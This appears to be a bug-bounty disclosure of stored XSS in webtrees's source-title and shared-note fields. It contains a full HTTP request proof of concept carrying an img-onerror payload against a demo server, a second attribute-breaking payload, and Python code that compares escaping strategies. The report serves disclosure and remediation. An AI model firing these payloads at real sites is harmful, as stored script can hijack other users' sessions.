Cross-site Scripting (XSS) - Stored in fisharebest/webtrees

Valid

Reported on

Sep 30th 2021


Description

Multiple stored XSS vulnerabilities when adding a new record through the "Add a source citation" and "Add a shared note" features. A payload entered as the title of a newly created source, or as the text of a newly created shared note, is saved with the record and executes whenever the record is rendered for a user.

Proof of Concept

// PoC.req (the create-source submission from the first scenario below; the payload is in the source-title field)
POST /demo-stable/index.php?route=%2Fdemo-stable%2Ftree%2Fdemo%2Fcreate-source HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=35jvr7cdk25bf0s6k0e1r91c3e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/
X-Csrf-Token: U4WFspy3SiSfyzQJ9lYihH20kG0SUVKt
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------75901138012122049362463935295
Content-Length: 1331
Origin: https://dev.webtrees.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="_csrf"

U4WFspy3SiSfyzQJ9lYihH20kG0SUVKt
-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-title"

"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-abbreviation"

test
-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-author"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-publication"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-repository"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-call-number"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="source-text"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="privacy-restriction"


-----------------------------75901138012122049362463935295
Content-Disposition: form-data; name="edit-restriction"


-----------------------------75901138012122049362463935295--

Steps to Reproduce

Add a source citation

Go to the details page of an individual, for example: https://dev.webtrees.net/demo-stable/index.php?route=%2Fdemo-stable%2Ftree%2Fdemo%2Findividual%2FI10034%2FAugustus-the-Younger-Duke-of-Brunswick-Luneburg

On the Sources tab, choose Add a source citation.

Under Source, choose Create a source.

In the Title field, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">

Add a shared note

On the Notes tab, choose Add a shared note.

Under Note, choose Create a shared note.

In the Note field, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">
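The leading "> in the payload used in both scenarios is designed to close a double-quoted HTML attribute and then open a new tag, which is why it fires wherever the stored title or note text is echoed into markup. The following is an added example for this report, not webtrees code: a hypothetical fragment (the /source/S1 link and its title attribute are assumptions) renders the stored value three ways, and a small parser-based audit shows which strategy still leaves an injected element or event handler. It also goes beyond the report's payload with a constructed attribute-only payload to show that encoding < and > alone is not a fix.

```python
"""Why the report's payload works and what stops it.

Added example for this report; it is not webtrees code. TEMPLATE is a
hypothetical stand-in for any page that renders a source title into both an
HTML attribute and a text node, which is what the leading '">' in the payload
is designed to break out of.
"""
import html
from html.parser import HTMLParser

# Payload exactly as submitted in the report above.
REPORT_PAYLOAD = '"><iMg SrC="x" oNeRRor="alert(1);">'
# Constructed payload (not from the report): it contains no '<' or '>' at all,
# so it survives angle-bracket-only filtering and still adds an event handler
# once it closes the surrounding double-quoted attribute.
ATTR_ONLY_PAYLOAD = '" onmouseover="alert(2)'

# Hypothetical fragment; the href and attribute name are assumptions.
TEMPLATE = '<a href="/source/S1" title="{t}">{t}</a>'


def render_unescaped(title: str) -> str:
    """Vulnerable: the stored title is interpolated verbatim."""
    return TEMPLATE.format(t=title)


def render_angle_only(title: str) -> str:
    """Half-measure: only < and > are encoded; quotes are left alone."""
    t = title.replace("<", "&lt;").replace(">", "&gt;")
    return TEMPLATE.format(t=t)


def render_escaped(title: str) -> str:
    """Fixed: html.escape(quote=True) encodes & < > " and ', the same set as
    PHP's htmlspecialchars($s, ENT_QUOTES), so the value can neither close
    the attribute nor open a new tag."""
    return TEMPLATE.format(t=html.escape(title, quote=True))


class ScriptSink(HTMLParser):
    """Records anything executable that the template never emitted: elements
    other than <a>, and any on* event-handler attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names, so the mixed-case
        # iMg / oNeRRor in the payload are matched here.
        if tag != "a":
            self.findings.append(f"unexpected element <{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}={value!r} on <{tag}>")


def audit(fragment: str) -> list[str]:
    """Parse a rendered fragment and return the injected script vectors.
    html.parser is forgiving: markup it treats as text can still be recovered
    as attributes by a browser tokenizer, so an empty result is weaker
    evidence than a non-empty one."""
    sink = ScriptSink()
    sink.feed(fragment)
    sink.close()
    return sink.findings


RENDERERS = {
    "unescaped": render_unescaped,
    "angle_only": render_angle_only,
    "escaped": render_escaped,
}


def compare(payload: str) -> dict[str, list[str]]:
    """Render one payload through every strategy and audit each result."""
    return {name: audit(fn(payload)) for name, fn in RENDERERS.items()}


if __name__ == "__main__":
    for label, payload in (("report", REPORT_PAYLOAD), ("attr-only", ATTR_ONLY_PAYLOAD)):
        for strategy, findings in compare(payload).items():
            print(f"{label:9s} {strategy:10s} {findings or 'clean'}")
```

Run it and compare the rows: the unescaped renderer turns the report's title into two live <img onerror> elements, the angle-only renderer still accepts the attribute-only payload as an onmouseover handler on the link, and only the fully escaped renderer is clean for both. The fix for a stored XSS like this one is therefore context-aware output encoding at render time (every attribute value and text node), not stripping angle brackets on input.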

Impact

The payload is stored with the record and runs in the browser of every user who views it, including administrators. Script running in the victim's session can read the session cookie, unless it is marked HttpOnly, and use it to gain unauthorized access to that user's account; even with HttpOnly set, the script can still issue authenticated requests on the victim's behalf.

A member of the fisharebest/webtrees team was contacted and a response was awaited (2 months ago)
Greg Roach validated this vulnerability (2 months ago)
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach confirmed that a fix has been merged in 6d966f (2 months ago)
Greg Roach has been awarded the fix bounty